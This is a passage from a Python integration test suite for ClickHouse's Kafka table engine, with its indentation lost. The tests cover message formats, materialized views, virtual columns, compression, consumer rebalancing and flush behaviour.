ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# the first consumer subscribes to the topic, tries to poll some data, and then goes idle
instance.query('SELECT * FROM test.kafka')
# the second consumer does the same, causing a rebalance in the first
# consumer, and tries to poll some data
instance.query('SELECT * FROM test.kafka2')
# echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# the first consumer has an unprocessed pending rebalance callback (no poll after the select)
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
kafka_delete_topic(admin_client, topic_name)
def test_kafka_csv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_tsv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce(kafka_cluster, 'tsv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_select_empty(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "empty"
kafka_create_topic(admin_client, topic_name)
instance.query(f'''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
kafka_delete_topic(admin_client, topic_name)
def test_kafka_json_without_delimiter(kafka_cluster):
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_protobuf(kafka_cluster):
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 0, 20)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 20, 1)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 21, 29)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_string_field_on_first_position_in_protobuf(kafka_cluster):
# https://github.com/ClickHouse/ClickHouse/issues/12615
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 0, 20)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 20, 1)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 21, 29)
instance.query('''
CREATE TABLE test.kafka (
username String,
timestamp Int32
) ENGINE = Kafka()
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'string_field_on_first_position_in_protobuf',
kafka_group_name = 'string_field_on_first_position_in_protobuf',
kafka_format = 'Protobuf',
kafka_schema = 'social:User';
''')
result = instance.query('SELECT * FROM test.kafka', ignore_error=True)
expected = '''\
John Doe 0 1000000
John Doe 1 1000001
John Doe 2 1000002
John Doe 3 1000003
John Doe 4 1000004
John Doe 5 1000005
John Doe 6 1000006
John Doe 7 1000007
John Doe 8 1000008
John Doe 9 1000009
John Doe 10 1000010
John Doe 11 1000011
John Doe 12 1000012
John Doe 13 1000013
John Doe 14 1000014
John Doe 15 1000015
John Doe 16 1000016
John Doe 17 1000017
John Doe 18 1000018
John Doe 19 1000019
John Doe 20 1000020
John Doe 21 1000021
John Doe 22 1000022
John Doe 23 1000023
John Doe 24 1000024
John Doe 25 1000025
John Doe 26 1000026
John Doe 27 1000027
John Doe 28 1000028
John Doe 29 1000029
John Doe 30 1000030
John Doe 31 1000031
John Doe 32 1000032
John Doe 33 1000033
John Doe 34 1000034
John Doe 35 1000035
John Doe 36 1000036
John Doe 37 1000037
John Doe 38 1000038
John Doe 39 1000039
John Doe 40 1000040
John Doe 41 1000041
John Doe 42 1000042
John Doe 43 1000043
John Doe 44 1000044
John Doe 45 1000045
John Doe 46 1000046
John Doe 47 1000047
John Doe 48 1000048
John Doe 49 1000049
'''
assert TSV(result) == TSV(expected)
def test_kafka_protobuf_no_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 0, 20)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 20, 1)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
instance.query('''
CREATE TABLE test.kafka_writer (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
instance.query("INSERT INTO test.kafka_writer VALUES (13,'Friday'),(42,'Answer to the Ultimate Question of Life, the Universe, and Everything'), (110, 'just a number')")
time.sleep(1)
result = instance.query("SELECT * FROM test.kafka ORDER BY key", ignore_error=True)
expected = '''\
13 Friday
42 Answer to the Ultimate Question of Life, the Universe, and Everything
110 just a number
'''
assert TSV(result) == TSV(expected)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
def test_kafka_recreate_kafka_table(kafka_cluster):
'''
Checks that the materialized view works properly after dropping and recreating the Kafka table.
'''
# line for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "recreate_kafka_table"
kafka_create_topic(admin_client, topic_name, num_partitions=6)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'recreate_kafka_table',
kafka_group_name = 'recreate_kafka_table_group',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 6,
kafka_flush_interval_ms = 1000,
kafka_skip_broken_messages = 1048577;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(120):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster,'recreate_kafka_table', messages)
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*recreate_kafka_table', repetitions=6, look_behind_lines=100)
instance.query('''
DROP TABLE test.kafka;
''')
kafka_produce(kafka_cluster,'recreate_kafka_table', messages)
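# messages produced while the Kafka table was dropped should still be consumed once it is
# recreated with the same consumer group (the assert below expects both batches, 240 rows total)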
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'recreate_kafka_table',
kafka_group_name = 'recreate_kafka_table_group',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 6,
kafka_flush_interval_ms = 1000,
kafka_skip_broken_messages = 1048577;
''')
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*recreate_kafka_table', repetitions=6, look_behind_lines=100)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.view")) == 240
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_delete_topic(admin_client, topic_name)
def test_librdkafka_compression(kafka_cluster):
"""
Regression test for UB in snappy-c (which is used in librdkafka);
the backport PR is [1].
[1]: https://github.com/ClickHouse-Extras/librdkafka/pull/3
Example of corruption:
2020.12.10 09:59:56.831507 [ 20 ] {} <Error> void DB::StorageKafka::threadFunc(size_t): Code: 27. DB::Exception: Cannot parse input: expected '"' before: 'foo"}': (while reading the value of key value): (at row 1)
To trigger this regression there should be duplicated messages.
The original reproducer is:
$ gcc --version |& fgrep gcc
gcc (GCC) 10.2.0
$ yes foobarbaz | fold -w 80 | head -n10 >| in-…
$ make clean && make CFLAGS='-Wall -g -O2 -ftree-loop-vectorize -DNDEBUG=1 -DSG=1 -fPIC'
$ ./verify in
final comparision of in failed at 20 of 100
"""
supported_compression_types = ['gzip', 'snappy', 'lz4', 'zstd', 'uncompressed']
messages = []
expected = []
value = 'foobarbaz'*10
number_of_messages = 50
for i in range(number_of_messages):
messages.append(json.dumps({'key': i, 'value': value}))
expected.append(f'{i}\t{value}')
expected = '\n'.join(expected)
for compression_type in supported_compression_types:
logging.debug(('Check compression {}'.format(compression_type)))
topic_name = 'test_librdkafka_compression_{}'.format(compression_type)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
kafka_create_topic(admin_client, topic_name, config={'compression.type': compression_type})
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = 'JSONEachRow',
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.consumer Engine=Log AS
SELECT * FROM test.kafka;
'''.format(topic_name=topic_name) )
kafka_produce(kafka_cluster, topic_name, messages)
instance.wait_for_log_line("Committed offset {}".format(number_of_messages))
result = instance.query('SELECT * FROM test.consumer')
assert TSV(result) == TSV(expected)
instance.query('DROP TABLE test.kafka SYNC')
instance.query('DROP TABLE test.consumer SYNC')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batches of messages of size ~100 KB
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce(kafka_cluster, 'flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in list(offsets.items()):
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages * batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
result = ''
while True:
result += instance.query(
'''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''',
ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'virt2', messages, 0)
sql = 'SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view ORDER BY kafka_key'
result = instance.query(sql)
iterations = 0
while not kafka_check_result(result, False, 'test_kafka_virtual2.reference') and iterations < 10:
time.sleep(3)
iterations += 1
result = instance.query(sql)
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume(kafka_cluster, 'insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
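# recreate the Kafka table with the same group: offsets committed per block must be respected,
# so the recreated consumer should not re-read already-flushed rows (checked below via count() == uniqExact(key))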
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
kafka_create_topic(admin_client, "virt2_0", num_partitions=2)
kafka_create_topic(admin_client, "virt2_1", num_partitions=2)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001,
headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002,
headers=[('empty_value', b''), ('', b'empty name'), ('', b''), ('repetition', b'1'), ('repetition', b'2')])
producer.flush()
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003,
headers=[('b', b'b'), ('a', b'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004,
headers=[('a', b'a'), ('b', b'b')])
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
instance.wait_for_log_line('kafka.*Committed offset 2.*virt2_[01]', repetitions=4, look_behind_lines=6000)
members = describe_consumer_group(kafka_cluster, 'virt2')
# pprint.pprint(members)
members[0]['client_id'] = 'ClickHouse-instance-test-kafka-0'
members[1]['client_id'] = 'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
kafka_delete_topic(admin_client, "virt2_0")
kafka_delete_topic(admin_client, "virt2_1")
def test_kafka_produce_key_timestamp(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "insert3"
kafka_create_topic(admin_client, topic_name)
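# test.kafka_writer is used to INSERT rows with an explicit _key and _timestamp;
# test.kafka reads them back and the view also captures the corresponding virtual columns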
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1, 1, 'k1', 1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2, 2, 'k2', 1577836802))
instance.query(
"INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3, 3,
'k3',
1577836803,
4, 4,
'k4',
1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5, 5, 'k5', 1577836805))
instance.wait_for_log_line("Committed offset 5")
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# logging.debug(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
kafka_delete_topic(admin_client, topic_name)
def test_kafka_flush_by_time(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "flush_by_time"
kafka_create_topic(admin_client, topic_name)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
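# sleep long enough for roughly two time-based flushes to happen; the check below expects
# exactly 2 distinct block insertion timestamps and at least 15 rows in the view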
time.sleep(18)
result = instance.query('SELECT uniqExact(ts) = 2, count() >= 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
